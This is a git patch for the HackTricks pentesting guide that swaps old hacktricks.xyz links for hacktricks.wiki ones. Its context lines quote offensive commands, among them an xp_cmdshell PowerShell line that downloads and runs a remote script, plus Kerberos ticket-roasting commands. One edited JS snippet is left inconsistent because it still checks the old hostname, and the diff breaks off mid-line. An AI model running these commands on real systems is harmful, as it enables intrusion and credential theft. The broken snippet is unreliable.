From 234e3d13c621c6cc27bfdeb96fc2c3baae50526d Mon Sep 17 00:00:00 2001 From: Jimmy Date: Fri, 10 Jan 2025 14:40:02 +0100 Subject: [PATCH] Update URLs --- src/SUMMARY.md | 8 ++++---- .../macos-electron-applications-injection.md | 2 +- .../113-pentesting-ident.md | 2 +- .../137-138-139-pentesting-netbios.md | 2 +- .../1521-1522-1529-pentesting-oracle-listener.md | 2 +- .../README.md | 2 +- src/network-services-pentesting/43-pentesting-whois.md | 2 +- .../5439-pentesting-redshift.md | 2 +- .../5985-5986-pentesting-winrm.md | 2 +- .../nfs-service-pentesting.md | 2 +- src/network-services-pentesting/pentesting-dns.md | 2 +- .../pentesting-ftp/README.md | 2 +- src/network-services-pentesting/pentesting-imap.md | 2 +- .../pentesting-kerberos-88/README.md | 2 +- src/network-services-pentesting/pentesting-ldap.md | 2 +- .../pentesting-mssql-microsoft-sql-server/README.md | 2 +- src/network-services-pentesting/pentesting-mysql.md | 2 +- src/network-services-pentesting/pentesting-ntp.md | 2 +- src/network-services-pentesting/pentesting-pop.md | 2 +- src/network-services-pentesting/pentesting-rdp.md | 2 +- src/network-services-pentesting/pentesting-rpcbind.md | 2 +- src/network-services-pentesting/pentesting-smb.md | 2 +- .../pentesting-smb/README.md | 2 +- .../pentesting-smtp/README.md | 2 +- .../pentesting-snmp/README.md | 2 +- src/network-services-pentesting/pentesting-telnet.md | 2 +- .../pentesting-web/README.md | 2 +- .../pentesting-web/angular.md | 2 +- .../pentesting-web/buckets/README.md | 2 +- .../pentesting-web/buckets/firebase-database.md | 2 +- src/pentesting-web/file-upload/README.md | 2 +- src/pentesting-web/oauth-to-account-takeover.md | 2 +- .../xss-cross-site-scripting/other-js-tricks.md | 2 +- src/todo/cookies-policy.md | 10 +++++----- src/welcome/hacktricks-values-and-faq.md | 2 +- .../active-directory-methodology/README.md | 4 ++-- src/windows-hardening/lateral-movement/README.md | 6 +++--- 37 files changed, 47 insertions(+), 47 deletions(-) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index fb3efcc74..60a9a9df7 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -289,7 +289,7 @@ - [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md) - [WinRM](windows-hardening/lateral-movement/winrm.md) - [WmiExec](windows-hardening/lateral-movement/wmiexec.md) -- [Pivoting to the Cloud$$external:https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements$$]() +- [Pivoting to the Cloud$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html$$]() - [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md) - [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md) - [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md) @@ -692,9 +692,9 @@ # ⛈️ Cloud Security -- [Pentesting Kubernetes$$external:https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security$$]() -- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology$$]() -- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology$$]() +- [Pentesting Kubernetes$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/index.html$$]() +- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/pentesting-cloud-methodology.html$$]() +- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html$$]() # 😎 Hardware/Physical Access diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md index f5c053b02..5adf076ce 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md @@ -4,7 +4,7 @@ ## Basic Information -If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). But for now just know that Electron runs **node**.\ +If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation). But for now just know that Electron runs **node**.\ And node has some **parameters** and **env variables** that can be use to **make it execute other code** apart from the indicated file. ### Electron Fuses diff --git a/src/network-services-pentesting/113-pentesting-ident.md b/src/network-services-pentesting/113-pentesting-ident.md index d0050da7a..f6118efaa 100644 --- a/src/network-services-pentesting/113-pentesting-ident.md +++ b/src/network-services-pentesting/113-pentesting-ident.md @@ -85,7 +85,7 @@ Entry_1: Note: | The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. - https://book.hacktricks.xyz/pentesting/113-pentesting-ident + https://book.hacktricks.wiki/en/network-services-pentesting/113-pentesting-ident.html Entry_2: Name: Enum Users diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md index 1d8db47da..8a1d77bf2 100644 --- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -74,7 +74,7 @@ Entry_1: For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. - https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios + https://book.hacktricks.wiki/en/network-services-pentesting/137-138-139-pentesting-netbios.html Entry_2: Name: Find Names diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md index ad4088b66..be070d818 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md @@ -54,7 +54,7 @@ Entry_1: for more details check https://github.com/quentinhardy/odat/wiki - https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener + https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index 4731a8f51..b400ed8ba 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -54,7 +54,7 @@ Entry_1: for more details check https://github.com/quentinhardy/odat/wiki - https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener + https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/43-pentesting-whois.md b/src/network-services-pentesting/43-pentesting-whois.md index fa1b5f89d..2991bc629 100644 --- a/src/network-services-pentesting/43-pentesting-whois.md +++ b/src/network-services-pentesting/43-pentesting-whois.md @@ -46,7 +46,7 @@ Entry_1: The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. - https://book.hacktricks.xyz/pentesting/pentesting-smtp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index 9fb89cfc1..a9e1f8cc8 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -9,7 +9,7 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P For more information check: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html {{#endref}} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index 0eaad0bbd..91010de08 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -291,7 +291,7 @@ Entry_1: print(s.run_cmd('ipconfig')) print(s.run_ps('ipconfig')) - https://book.hacktricks.xyz/pentesting/pentesting-winrm + https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html Entry_2: Name: Hydra Brute Force diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md index 96ef5c155..37e4a718b 100644 --- a/src/network-services-pentesting/nfs-service-pentesting.md +++ b/src/network-services-pentesting/nfs-service-pentesting.md @@ -119,7 +119,7 @@ Entry_1: cd /mnt nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in - https://book.hacktricks.xyz/pentesting/nfs-service-pentesting + https://book.hacktricks.wiki/en/network-services-pentesting/nfs-service-pentesting.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-dns.md b/src/network-services-pentesting/pentesting-dns.md index 3d3b06e2d..6700273f3 100644 --- a/src/network-services-pentesting/pentesting-dns.md +++ b/src/network-services-pentesting/pentesting-dns.md @@ -233,7 +233,7 @@ Entry_1: Domain_Name exit - https://book.hacktricks.xyz/pentesting/pentesting-dns + https://book.hacktricks.wiki/en/todo/pentesting-dns.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md index 365455e68..46cb1cb95 100644 --- a/src/network-services-pentesting/pentesting-ftp/README.md +++ b/src/network-services-pentesting/pentesting-ftp/README.md @@ -245,7 +245,7 @@ Entry_1: wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' if PASV transfer is disabled - https://book.hacktricks.xyz/pentesting/pentesting-ftp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ftp/index.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-imap.md b/src/network-services-pentesting/pentesting-imap.md index 76287cbf1..1dc3e8240 100644 --- a/src/network-services-pentesting/pentesting-imap.md +++ b/src/network-services-pentesting/pentesting-imap.md @@ -173,7 +173,7 @@ Entry_1: Note: | The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used. - https://book.hacktricks.xyz/pentesting/pentesting-imap + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-imap.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index dbc1286da..7c6bc8467 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -49,7 +49,7 @@ Entry_1: Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. - https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html Entry_2: Name: Pre-Creds diff --git a/src/network-services-pentesting/pentesting-ldap.md b/src/network-services-pentesting/pentesting-ldap.md index 001144b6a..8cc58a5db 100644 --- a/src/network-services-pentesting/pentesting-ldap.md +++ b/src/network-services-pentesting/pentesting-ldap.md @@ -396,7 +396,7 @@ Entry_1: Note: | The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. - https://book.hacktricks.xyz/pentesting/pentesting-ldap + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index a003109da..da7fdda89 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -673,7 +673,7 @@ Entry_1: xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" - https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html Entry_2: Name: Nmap for SQL diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index cc8193ae3..d7f9cd8ab 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -623,7 +623,7 @@ Entry_1: Note: | MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). - https://book.hacktricks.xyz/pentesting/pentesting-mysql + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index 02764d893..f0844071c 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -71,7 +71,7 @@ Entry_1: Note: | The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. - https://book.hacktricks.xyz/pentesting/pentesting-ntp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ntp.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-pop.md b/src/network-services-pentesting/pentesting-pop.md index 58d67f223..3af742556 100644 --- a/src/network-services-pentesting/pentesting-pop.md +++ b/src/network-services-pentesting/pentesting-pop.md @@ -98,7 +98,7 @@ Entry_1: Note: | Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version. - https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-pop.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md index afb6cdded..66f2a52dd 100644 --- a/src/network-services-pentesting/pentesting-rdp.md +++ b/src/network-services-pentesting/pentesting-rdp.md @@ -136,7 +136,7 @@ Entry_1: Note: | Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. - https://book.hacktricks.xyz/pentesting/pentesting-rdp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-rpcbind.md b/src/network-services-pentesting/pentesting-rpcbind.md index cb02d5574..5ed00886e 100644 --- a/src/network-services-pentesting/pentesting-rpcbind.md +++ b/src/network-services-pentesting/pentesting-rpcbind.md @@ -99,7 +99,7 @@ Entry_1: Note: | Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively. - https://book.hacktricks.xyz/pentesting/pentesting-rpcbind + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html Entry_2: Name: rpc info diff --git a/src/network-services-pentesting/pentesting-smb.md b/src/network-services-pentesting/pentesting-smb.md index 7656937ad..2c6bd0de1 100644 --- a/src/network-services-pentesting/pentesting-smb.md +++ b/src/network-services-pentesting/pentesting-smb.md @@ -559,7 +559,7 @@ Entry_1: GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request - https://book.hacktricks.xyz/pentesting/pentesting-smb + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html Entry_2: Name: Enum4Linux diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 0dfb197d5..4bada01ee 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -559,7 +559,7 @@ Entry_1: GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request - https://book.hacktricks.xyz/pentesting/pentesting-smb + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html Entry_2: Name: Enum4Linux diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md index 2ebf994af..76a33d55b 100644 --- a/src/network-services-pentesting/pentesting-smtp/README.md +++ b/src/network-services-pentesting/pentesting-smtp/README.md @@ -564,7 +564,7 @@ Entry_1: Note: | SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server. - https://book.hacktricks.xyz/pentesting/pentesting-smtp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md index 8cc41a64e..ce88852bc 100644 --- a/src/network-services-pentesting/pentesting-snmp/README.md +++ b/src/network-services-pentesting/pentesting-snmp/README.md @@ -256,7 +256,7 @@ Entry_1: Note: | SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...). - https://book.hacktricks.xyz/pentesting/pentesting-snmp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html Entry_2: Name: SNMP Check diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 82cf4831e..4bc44869f 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -57,7 +57,7 @@ Entry_1: wireshark to hear creds being passed tcp.port == 23 and ip.addr != myip - https://book.hacktricks.xyz/pentesting/pentesting-telnet + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 0feb403ae..5b49ff7ba 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -359,7 +359,7 @@ Entry_1: Name: Notes Description: Notes for Web Note: | - https://book.hacktricks.xyz/pentesting/pentesting-web + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/index.html Entry_2: Name: Quick Web Scan diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md index f1b1a7c22..85099019a 100644 --- a/src/network-services-pentesting/pentesting-web/angular.md +++ b/src/network-services-pentesting/pentesting-web/angular.md @@ -602,7 +602,7 @@ According to the W3C documentation, the `window.location` and `document.location * [GitHub - angular/dom\_security\_schema.ts](https://github.com/angular/angular/blob/main/packages/compiler/src/schema/dom\_security\_schema.ts) * [XSS in Angular and AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md) * [Angular Universal](https://angular.io/guide/universal) -* [DOM XSS](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss) +* [DOM XSS](https://book.hacktricks.wiki/en/pentesting-web/xss-cross-site-scripting/dom-xss.html) * [Angular ElementRef](https://angular.io/api/core/ElementRef) * [Angular Renderer2](https://angular.io/api/core/Renderer2) * [Renderer2 Example: Manipulating DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/) diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 498f20fa7..9ed6844e1 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -5,7 +5,7 @@ Check this page if you want to learn more about enumerating and abusing Buckets: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum {{#endref}} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 5e7b54490..ae9df2254 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -9,7 +9,7 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused Learn more about Firebase in: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html {{#endref}} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 76adc985a..0b471533a 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -89,7 +89,7 @@ Other useful extensions: ### Special extension tricks -If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\ +If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\ If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files). The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...) diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index cf7454fea..d8bb60956 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md @@ -158,7 +158,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ For more detailed info about how to abuse AWS cognito check: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html {{#endref}} ### Abusing other Apps tokens diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md index 6a4bcadb5..5e6a3d4a7 100644 --- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md +++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md @@ -170,7 +170,7 @@ document.body.append(anchor) a = document.createElement("a") log = [] for (let i = 0; i <= 0x10ffff; i++) { - a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz` + a.href = `${String.fromCodePoint(i)}https://hacktricks.wiki` if (a.hostname === "hacktricks.xyz") { log.push(i) } diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md index 427802224..5944d656d 100644 --- a/src/todo/cookies-policy.md +++ b/src/todo/cookies-policy.md @@ -6,10 +6,10 @@ Last updated: 02/04/2023 This Cookies Policy applies to the following websites owned and operated by HackTricks team ("HackTricks", "we", "us" or "our"): -* hacktricks.xyz -* [www.hacktricks.xyz](http://www.hacktricks.xyz/) -* book.hacktricks.xyz -* cloud.hacktricks.xyz +* hacktricks.wiki +* [www.hacktricks.wiki](https://www.hacktricks.wiki/) +* book.hacktricks.wiki +* cloud.hacktricks.wiki By using any of these websites, you agree to the use of cookies in accordance with this Cookies Policy. If you do not agree, please disable cookies in your browser settings or refrain from using our websites. @@ -26,7 +26,7 @@ We use cookies on our websites for the following purposes: 3. Functionality cookies: These cookies enable our websites to remember choices you make, such as your language or region, to provide a more personalized experience. 4. Targeting/advertising cookies: These cookies are used to deliver relevant ads and marketing communications based on your interests, browsing history, and interactions with our websites. -Moreover, the pages book.hacktricks.xyz and cloud.hacktricks.xyz are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy). +Moreover, the pages book.hacktricks.wiki and cloud.hacktricks.wiki are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy). ### Third-party cookies diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index dc48dd373..dd5cea83d 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -58,7 +58,7 @@ If you need a bibtex you can use something like: author = {"HackTricks Team" or the Authors name of the specific page/trick}, title = {Title of the Specific Page}, year = {Year of Last Update (check it at the end of the page)}, - url = {\url{https://book.hacktricks.xyz/specific-page}}, + url = {\url{https://book.hacktricks.wiki/specific-page}}, } ``` diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index e016edcca..77130c545 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md @@ -67,7 +67,7 @@ If you just have access to an AD environment but you don't have any credentials/ - Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) - Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) - Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) -- [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology): +- [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html): - Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available. - If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123). - Tools: @@ -685,7 +685,7 @@ rdp-sessions-abuse.md ## AD -> Azure & Azure -> AD {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity +https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html {{#endref}} ## Some General Defenses diff --git a/src/windows-hardening/lateral-movement/README.md b/src/windows-hardening/lateral-movement/README.md index f43129809..648a1f1e7 100644 --- a/src/windows-hardening/lateral-movement/README.md +++ b/src/windows-hardening/lateral-movement/README.md @@ -10,9 +10,9 @@ There are different different ways to execute commands in external systems, here - [**AtExec / SchtasksExec**](atexec.md) - [**WinRM**](winrm.md) - [**DCOM Exec**](dcom-exec.md) -- [**Pass the cookie**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) (cloud) -- [**Pass the PRT**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) (cloud) -- [**Pass the AzureAD 